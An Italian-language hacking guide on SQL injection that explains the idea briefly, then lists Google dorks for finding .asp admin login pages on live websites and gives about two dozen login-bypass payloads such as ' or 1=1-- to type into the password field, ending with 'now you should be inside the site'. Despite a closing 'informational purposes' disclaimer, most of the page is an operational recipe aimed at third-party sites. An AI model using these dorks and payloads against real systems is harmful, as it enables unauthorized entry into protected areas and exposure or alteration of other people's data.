SQL Injection

SQL Injection

oOG4m30v3rOo


SQL injection è una tecnica dell'hacking mirata a colpire le applicazioni web che si appoggiano su un database di tipo SQL.

Questo exploit sfrutta l'inefficienza dei controlli sui dati ricevuti in input ed inserisce codice maligno all'interno di una query SQL.

Le conseguenze prodotte sono imprevedibili per il programmatore: l'SQL injection permette al malintenzionato di autenticarsi con ampi privilegi in aree protette del sito anche senza essere in possesso delle credenziali d'accesso e di visualizzare e/o alterare dati sensibili.


La sensibilità avviene in un codice del tipo:

<form action='login.php' method='post'>

Username: <input type='text' name='user' />

Password: <input type='password' name='pwd' />

<input type='submit' value='Login' />

</form>


Naturalmente,potremmo visualizzare l'HTML del form di Login di un sito,oppure possiamo hackare molti siti sensibili,la maggior parte di essi implementa un linguaggio in .asp


Scriviamo su Google uno di questi Dork:


inurl:adminlogin.asp


inurl:admin_login.asp


inurl:adminlogon.asp


inurl:admin_logon.asp


inurl:/admin.asp


inurl:/login.asp


inurl:/logon.asp


inurl:/adminlogin.asp


inurl:/adminlogon.asp


inurl:/admin_login.asp


inurl:/admin_logon.asp


inurl:/admin/admin.asp


inurl:/admin/login.asp


inurl:/admin/logon.asp


inurl:/admin/adminlogin.asp


inurl:/admin/adminlogon.asp


inurl:/admin/admin_login.asp


inurl:/admin/admin_logon.asp


inurl:/administrator/admin.asp


inurl:/administrator/login.asp


inurl:/administrator/logon.asp


inurl:root/login.asp


inurl:admin/index.asp



Clicchiamo su un sito (naturalmente esistono anche persone normali che proteggono il codice,di conseguenza non vi abbattete al primo tentativo) e nel form inseriamo queste informazioni.


Nella TextBox dove inserire l'ID dell'Administrator scrivete quello che trovate tra le virgolette: "admin"

Nella TextBox dove inserire la Password dell'admin scrivete una delle seguenti stringhe:


admin'--


1'or'1'='1


' or 0=0 --


" or 0=0 --


or 0=0 --


' or 0=0 #


" or 0=0 #


or 0=0 #


' or 'x'='x


" or "x"="x


') or ('x'='x


' or 1=1--


" or 1=1--


or 1=1--


' or a=a--


" or "a"="a


') or ('a'='a


") or ("a"="a


hi" or "a"="a


hi" or 1=1 --


hi' or 1=1 --


hi' or 'a'='a


hi') or ('a'='a


hi") or ("a"="a


1' OR '1'='1


Bene ora dovresti essere dentro al sito.

Se volessi altre dork, consiglio questa lista aggiornata al 2017

https://hackingvision.com/2017/04/14/google-dorks-list-2017-sqli/

Questa guida è stata creata per scopo informativo.

Per tanto io ed il mio staff di @NSH_NEWS non ci prendiamo nessuna responsabilità.

Report Page